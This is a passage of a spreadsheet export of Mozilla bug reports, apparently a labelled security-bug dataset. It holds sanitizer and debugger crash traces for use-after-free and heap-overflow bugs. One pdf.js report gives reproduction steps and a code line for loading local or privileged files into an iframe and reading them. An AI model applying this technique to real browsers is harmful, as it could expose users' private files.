    #42 0x7f7e71bf6491 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1070:7
previously allocated by thread T0 (file:// Content) here:
    #0 0x4bed83 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x4ef7ed in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:70:17
    #2 0x7f7e716e3fc9 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:159:12
    #3 0x7f7e716e3fc9 in mozilla::dom::FontFaceSet::FontFaceSet(nsPIDOMWindowInner*, nsIDocument*) /builds/worker/workspace/build/src/layout/style/FontFaceSet.cpp:158
    #4 0x7f7e6d105c7f in nsIDocument::Fonts() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:13310:24
    #5 0x7f7e6eafa608 in mozilla::dom::DocumentBinding::get_fonts(JSContext*, JS::Handle&lt;JSObject*&gt;, nsIDocument*, JSJitGetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:5700:63
    #6 0x7f7e6f14c5a1 in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2911:13
    #7 0x7f7e75cf0014 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #8 0x7f7e75cf0014 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #9 0x7f7e75cf2032 in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #10 0x7f7e75cf2032 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541
    #11 0x7f7e75cf2032 in js::CallGetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:656
    #12 0x7f7e76d9a7cf in CallGetter /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2125:16
    #13 0x7f7e76d9a7cf in GetExistingProperty&lt;js::AllowGC::CanGC&gt; /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2178
    #14 0x7f7e76d9a7cf in NativeGetPropertyInline&lt;js::AllowGC::CanGC&gt; /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2381
    #15 0x7f7e76d9a7cf in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2417
    #16 0x7f7e6f143b93 in mozilla::dom::GetPropertyOnPrototype(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, bool*, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2098:10
    #17 0x7f7e6ed0663c in mozilla::dom::HTMLDocumentBinding::DOMProxyHandler::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) const /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:2183:8
    #18 0x7f7e76aae85e in getInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:352:21
    #19 0x7f7e76aae85e in js::Proxy::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:362
    #20 0x7f7e75cfb5ff in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1618:16
    #21 0x7f7e75cfb5ff in GetProperty /builds/worker/workspace/build/src/js/src/jsobj.h:804
    #22 0x7f7e75cfb5ff in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4405
    #23 0x7f7e75ccfc81 in GetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:219:12
    #24 0x7f7e75ccfc81 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2815
    #25 0x7f7e75cc2860 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #26 0x7f7e75cf054c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #27 0x7f7e75cf1072 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #28 0x7f7e767ec5ec in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2995:12
    #29 0x7f7e6ea8070e in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #30 0x7f7e6f646fd3 in Call&lt;nsISupports *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #31 0x7f7e6f646fd3 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #32 0x7f7e6f60d901 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:51
    #33 0x7f7e6f60f812 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:20
    #34 0x7f7e6f5fa1ff in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #35 0x7f7e6f5fdaeb in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
    #36 0x7f7e71bf6491 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1070:7
    #37 0x7f7e74f6d2c2 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7907:21
    #38 0x7f7e74f691ea in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7700:7
    #39 0x7f7e74f70fef in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #40 0x7f7e6bdf7c77 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1319:3
    #41 0x7f7e6bdf6e81 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:862:14
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/gfx/thebes/gfxUserFontSet.cpp:560:41 in gfxUserFontEntry::DoLoadNextSrc(bool)
Shadow bytes around the buggy address:
  0x0c1080006cd0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 05 fa
  0x0c1080006ce0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1080006cf0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1080006d00: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c1080006d10: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
=&gt;0x0c1080006d20: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fa
  0x0c1080006d30: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c1080006d40: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1080006d50: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1080006d60: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1080006d70: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd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8235==ABORTING</t>
        </is>
      </c>
      <c r="X4039" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4040">
      <c r="A4040" t="n">
        <v>922144</v>
      </c>
      <c r="B4040" t="inlineStr">
        <is>
          <t>2013-09-30 08:24:04 -0700</t>
        </is>
      </c>
      <c r="C4040" t="inlineStr">
        <is>
          <t>Full page design for VariablesView</t>
        </is>
      </c>
      <c r="D4040" t="inlineStr">
        <is>
          <t>2020-01-21 14:21:09 -0800</t>
        </is>
      </c>
      <c r="E4040" t="n">
        <v>1</v>
      </c>
      <c r="F4040" t="n">
        <v>1</v>
      </c>
      <c r="G4040" t="n">
        <v>6</v>
      </c>
      <c r="H4040" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4040" t="inlineStr">
        <is>
          <t>DevTools Graveyard</t>
        </is>
      </c>
      <c r="J4040" t="inlineStr">
        <is>
          <t>WebIDE</t>
        </is>
      </c>
      <c r="K4040" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4040" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4040" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4040" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4040" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4040" t="inlineStr"/>
      <c r="Q4040" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4040" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4040" t="inlineStr">
        <is>
          <t>Firefox 27</t>
        </is>
      </c>
      <c r="T4040" t="n">
        <v>1</v>
      </c>
      <c r="U4040" t="n">
        <v>0</v>
      </c>
      <c r="V4040" t="n">
        <v>48</v>
      </c>
      <c r="W4040" t="inlineStr">
        <is>
          <t>We'd like to use VariableView as a JSON / manifest editor in the App Manager.  We have lots of room on page to dedicate for this purpose, so we should come up with a larger layout / design for the VariablesView here.</t>
        </is>
      </c>
      <c r="X4040" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4041">
      <c r="A4041" t="n">
        <v>920515</v>
      </c>
      <c r="B4041" t="inlineStr">
        <is>
          <t>2013-09-25 06:37:11 -0700</t>
        </is>
      </c>
      <c r="C4041" t="inlineStr">
        <is>
          <t>pdf.js iframe injection allows sites to load local files or even chrome privileged pages into an iframe</t>
        </is>
      </c>
      <c r="D4041" t="inlineStr">
        <is>
          <t>2024-05-30 08:07:45 -0700</t>
        </is>
      </c>
      <c r="E4041" t="n">
        <v>1</v>
      </c>
      <c r="F4041" t="n">
        <v>1</v>
      </c>
      <c r="G4041" t="n">
        <v>2</v>
      </c>
      <c r="H4041" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4041" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4041" t="inlineStr">
        <is>
          <t>PDF Viewer</t>
        </is>
      </c>
      <c r="K4041" t="inlineStr">
        <is>
          <t>23 Branch</t>
        </is>
      </c>
      <c r="L4041" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4041" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4041" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4041" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4041" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main25+][adv-esr24-1+] https://github.com/mozilla/pdf.js/pull/3735</t>
        </is>
      </c>
      <c r="Q4041" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4041" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4041" t="inlineStr">
        <is>
          <t>Firefox 27</t>
        </is>
      </c>
      <c r="T4041" t="n">
        <v>1</v>
      </c>
      <c r="U4041" t="n">
        <v>0</v>
      </c>
      <c r="V4041" t="n">
        <v>25</v>
      </c>
      <c r="W4041" t="inlineStr">
        <is>
          <t>Created attachment 809860
mapLocalFiles.html
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 (Beta/Release)
Build ID: 20130814063812
Steps to reproduce:
I created and added an embed element to the document of a page initially setting the src attribute for the embed to 'data:application/pdf,'.  This triggers the pdfjs implementation and begins to load it to preview the plugin.  Immediately after I created an iframe element and appended it as a child of the embed element.  Normally when previewing a pdf as a plugin, an anonymous iframe is created as a child of the embed element, but apparently any iframe that is a child of the embed element will behave as if bound to it for previewing.  At this point all that is required is to change the src attribute of the embed element to whatever file(local or chrome privileged) that you want to load and then change the location of iframe.contentWindow like so:
iframe.contentWindow.location = 'data:application/x-moz-playpreview-pdfjs;,';
This triggers code in PdfRedirector.js that is part of the pdfjs implementation, which checks the src attribute of the embed element and loads it into the frame as if it were a pdf document.
Actual results:
A local file was loaded into the iframe.  Using this technique with canvas to get an image of the page or just trying to access iframe.contentWindow.location.href and catching the error from that, a person could either read the content of local files, or at least confirm their existence.
A few extra notes on this, I think this has been possible since its been possible to load the new pdfjs implementation as a plugin, its confirmed to work all the way up to the newest nightly and a few other dated installs as well.  I just discovered this yesterday, and I spent all the time I could spare trying to find ways to load up a chrome xul document and somehow achieve script injection into it.  I'm sure that it's possible, but I don't have as much time as I've had before to sink into this, and since this is serious enough to have me worried, I went this route this morning.  I really wanted that proper calc poc, and although this is nice its just not the same =/
Expected results:
Since PdfRedirector.js is running with full chrome privileges, it should have a check before loading any data to make sure that the data is expected, and of the right type.  If this is not the case it should cease loading and throw an exception.</t>
        </is>
      </c>
      <c r="X4041" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4042">
      <c r="A4042" t="n">
        <v>1398381</v>
      </c>
      <c r="B4042" t="inlineStr">
        <is>
          <t>2017-09-08 16:05:44 -0700</t>
        </is>
      </c>
      <c r="C4042" t="inlineStr">
        <is>
          <t>Heap Buffer Overflow in CopyNativeVertexData (ANGLE)</t>
        </is>
      </c>
      <c r="D4042" t="inlineStr">
        <is>
          <t>2024-05-30 09:36:34 -0700</t>
        </is>
      </c>
      <c r="E4042" t="n">
        <v>1</v>
      </c>
      <c r="F4042" t="n">
        <v>1</v>
      </c>
      <c r="G4042" t="n">
        <v>3</v>
      </c>
      <c r="H4042" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4042" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4042" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K4042" t="inlineStr">
        <is>
          <t>45 Branch</t>
        </is>
      </c>
      <c r="L4042" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4042" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4042" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4042" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4042" t="inlineStr">
        <is>
          <t>[adv-main56+][adv-esr52.4+]</t>
        </is>
      </c>
      <c r="Q4042" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4042" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4042" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T4042" t="n">
        <v>0</v>
      </c>
      <c r="U4042" t="n">
        <v>0</v>
      </c>
      <c r="V4042" t="n">
        <v>5</v>
      </c>
      <c r="W4042" t="inlineStr">
        <is>
          <t>Created attachment 8906163
CopyNativeVertex.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Steps to reproduce:
Run the uploaded file to see the heap buffer overflow on Stable editions on Windows Firefox x64/x86.
Actual results:
1:061:x86&gt; r
eax=14500e4c ebx=0ecf4000 ecx=00000e4c edx=0002ff4c esi=14500000 edi=07122100
eip=6f83cf5e esp=008fd830 ebp=008fd848 iopl=0         nv up ei pl nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210207
VCRUNTIME140!memcpy+0x4e:
6f83cf5e f3a4            rep movs byte ptr es:[edi],byte ptr [esi]
1:061:x86&gt; kb
 # ChildEBP RetAddr  Args to Child              
00 008fd834 658dfde2 070f3000 144d0f00 0002ff4c VCRUNTIME140!memcpy+0x4e [f:\dd\vctools\crt\vcruntime\src\string\i386\memcpy.asm @ 194]
01 008fd848 658d37b5 144d0f00 0000000c 00003ff1 libGLESv2!rx::CopyNativeVertexData&lt;unsigned int,3,3,0&gt;+0x19 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\copyvertex.inl @ 17]
02 008fd878 658ad39c 008fd8ac 0000000c 00001406 libGLESv2!rx::VertexBuffer11::storeVertexAttributes+0xcb [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\vertexbuffer11.cpp @ 144]
03 008fd8c8 658adf48 008fd900 0ecf4000 00001406 libGLESv2!rx::StreamingVertexBufferInterface::storeDynamicAttribute+0xf0 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\vertexbuffer.cpp @ 173]
04 008fd90c 658add39 008fd938 144d0f00 00000000 libGLESv2!rx::VertexDataManager::storeDynamicAttrib+0x10d [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\vertexdatamanager.cpp @ 480]
05 008fd970 658d354b 008fda14 0f068b68 008fd99c libGLESv2!rx::VertexDataManager::storeDynamicAttribs+0x13d [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\vertexdatamanager.cpp @ 400]
06 008fd9e0 658c2e1b 008fda14 14226b20 0f0452f8 libGLESv2!rx::VertexArray11::updateDirtyAndDynamicAttribs+0x2aa [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\vertexarray11.cpp @ 220]
07 008fda1c 658c7a88 008fda5c 0f0452f8 00000003 libGLESv2!rx::Renderer11::applyVertexBuffer+0x35 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\renderer11.cpp @ 1698]
08 008fdaa4 658baca5 008fdaf0 0ccdfdd0 00000003 libGLESv2!rx::Renderer11::genericDrawElements+0x13b [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\renderer11.cpp @ 4514]
09 008fdacc 6587b2ad 008fdaf0 00000003 00000006 libGLESv2!rx::Context11::drawElements+0x20 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\context11.cpp @ 168]
0a (Inline) -------- -------- -------- -------- libGLESv2!gl::Context::drawElements+0x23 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\gfx\angle\src\libangle\context.cpp @ 1631]
0b 008fdb08 5c24b5a7 00000003 00000006 00001403 libGLESv2!gl::DrawElements+0x5f [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\gfx\angle\src\libglesv2\entry_points_gles_2_0.cpp @ 792]
0c (Inline) -------- -------- -------- -------- xul!mozilla::gl::GLContext::raw_fDrawElements+0x18 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\gfx\gl\glcontext.h @ 1147]
0d 008fdb20 5c6fdd62 00000003 00000006 00001403 xul!mozilla::gl::GLContext::fDrawElements+0x19 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\gfx\gl\glcontext.h @ 1161]
0e 008fdb70 5c5bda0c 00000003 00000006 00001403 xul!mozilla::WebGLContext::DrawElements+0xf9 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\canvas\webglcontextdraw.cpp @ 819]
0f 008fdba8 5b5e858a 04530000 008fdc10 0ecf3400 xul!mozilla::dom::WebGLRenderingContextBinding::drawElements+0xa8 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dom\bindings\webglrenderingcontextbinding.cpp @ 14403]
10 (Inline) -------- -------- -------- -------- xul!mozilla::dom::GenericBindingMethod+0xce [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\bindings\bindingutils.cpp @ 2812]
11 (Inline) -------- -------- -------- -------- xul!js::CallJSNative+0x383 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\jscntxtinlines.h @ 235]
12 008fdc44 5b5e8133 00000000 04530000 ffffff8c xul!js::InternalCallOrConstruct+0x40a [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\vm\interpreter.cpp @ 458]
13 008fdc68 5b6b26e3 1d7ff810 12237112 008fdd90 xul!InternalCall+0xa3 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\vm\interpreter.cpp @ 503]
14 (Inline) -------- -------- -------- -------- xul!js::CallFromStack+0xb [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\vm\interpreter.cpp @ 509]
15 008fdd6c 160a129f 04530000 008fde28 1d7ff810 xul!js::jit::DoCallFallback+0x403 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\jit\baselineic.cpp @ 6008]
WARNING: Frame IP not in any known module. Following frames may be wrong.
16 008fddec 12237112 00005821 00000000 ffffff81 0x160a129f
17 008fde4c 160a0943 00001444 c450d882 00000000 0x12237112
18 00000000 00000000 00000000 00000000 00000000 0x160a0943</t>
        </is>
      </c>
      <c r="X4042" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4043">
      <c r="A4043" t="n">
        <v>676918</v>
      </c>
      <c r="B4043" t="inlineStr">
        <is>
          <t>2011-08-05 13:01:15 -0700</t>
        </is>
      </c>
      <c r="C4043" t="inlineStr">
        <is>
          <t>[ANGLE] crash from CanvasLayerD3D9::UpdateSurface [@ gl::Context::readPixels(int, int, int, int, unsigned int, unsigned int, void*) ]</t>
        </is>
      </c>
      <c r="D4043" t="inlineStr">
        <is>
          <t>2012-01-19 11:26:54 -0800</t>
        </is>
      </c>
      <c r="E4043" t="n">
        <v>1</v>
      </c>
      <c r="F4043" t="n">
        <v>1</v>
      </c>
      <c r="G4043" t="n">
        <v>3</v>
      </c>
      <c r="H4043" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4043" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4043" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K4043" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4043" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4043" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4043" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4043" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4043" t="inlineStr">
        <is>
          <t>[sg:high?][qa?]</t>
        </is>
      </c>
      <c r="Q4043" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4043" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4043" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T4043" t="n">
        <v>1</v>
      </c>
      <c r="U4043" t="n">
        <v>0</v>
      </c>
      <c r="V4043" t="n">
        <v>7</v>
      </c>
      <c r="W4043" t="inlineStr">
        <is>
          <t>I got this following the STR from bug 675634, having locked my screen as suggested in bug 675634 comment 7. The crash occured some time after unlocking. Instead of getting bug 675634, I got this new one.
Crash link:
https://crash-stats.mozilla.com/report/index/bp-b97104c7-6074-4ff8-b13f-f33742110805
Crash Reason	EXCEPTION_ACCESS_VIOLATION_READ
Crash Address	0xffffffffc2782607
0 	libGLESv2.dll 	gl::Context::readPixels 	gfx/angle/src/libglesv2/Context.cpp:2128
1 	libGLESv2.dll 	glReadPixels 	gfx/angle/src/libglesv2/libGLESv2.cpp:3956
2 	xul.dll 	mozilla::gl::GLContext::ReadPixelsIntoImageSurface 	gfx/thebes/GLContext.cpp:1223
3 	xul.dll 	mozilla::layers::CanvasLayerD3D9::UpdateSurface 	gfx/layers/d3d9/CanvasLayerD3D9.cpp:131
4 	xul.dll 	mozilla::layers::CanvasLayerD3D9::RenderLayer 	gfx/layers/d3d9/CanvasLayerD3D9.cpp:211
The crash line is:
http://hg.mozilla.org/releases/mozilla-beta/file/f327eb465d32/gfx/angle/src/libGLESv2/Context.cpp#l2128
  2109     IDirect3DSurface9 *systemSurface;
  2110     HRESULT result = device-&gt;CreateOffscreenPlainSurface(desc.Width, desc.Height, desc.Format, D3DPOOL_SYSTEMMEM, &amp;systemSurface, NULL);
  2111 
  2112     if (result == D3DERR_OUTOFVIDEOMEMORY || result == E_OUTOFMEMORY)
  2113     {
  2114         return error(GL_OUT_OF_MEMORY);
  2115     }
  2116 
  2117     ASSERT(SUCCEEDED(result));
  2118 
  2119     if (desc.MultiSampleType != D3DMULTISAMPLE_NONE)
  2120     {
  2121         UNIMPLEMENTED();   // FIXME: Requires resolve using StretchRect into non-multisampled render target
  2122     }
  2123 
  2124     result = device-&gt;GetRenderTargetData(renderTarget, systemSurface);
  2125 
  2126     if (FAILED(result))
  2127     {
  2128         systemSurface-&gt;Release();    ////// &lt;--- CRASH HERE
So maybe we need to check that CreateOffscreenPlainSurface succeeded?</t>
        </is>
      </c>
      <c r="X4043" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4044">
      <c r="A4044" t="n">
        <v>883686</v>
      </c>
      <c r="B4044" t="inlineStr">
        <is>
          <t>2013-06-16 16:32:16 -0700</t>
        </is>
      </c>
      <c r="C4044" t="inlineStr">
        <is>
          <t>valgrind errors in JS testsuite ("conditional jumps on uninitialized data")</t>
        </is>
      </c>
      <c r="D4044" t="inlineStr">
        <is>
          <t>2024-05-30 08:04:17 -0700</t>
        </is>
      </c>
      <c r="E4044" t="n">
        <v>1</v>
      </c>
      <c r="F4044" t="n">
        <v>1</v>
      </c>
      <c r="G4044" t="n">
        <v>3</v>
      </c>
      <c r="H4044" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4044" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4044" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4044" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4044" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4044" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4044" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4044" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4044" t="inlineStr">
        <is>
          <t>[adv-main24+]</t>
        </is>
      </c>
      <c r="Q4044" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4044" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4044" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T4044" t="n">
        <v>1</v>
      </c>
      <c r="U4044" t="n">
        <v>0</v>
      </c>
      <c r="V4044" t="n">
        <v>14</v>
      </c>
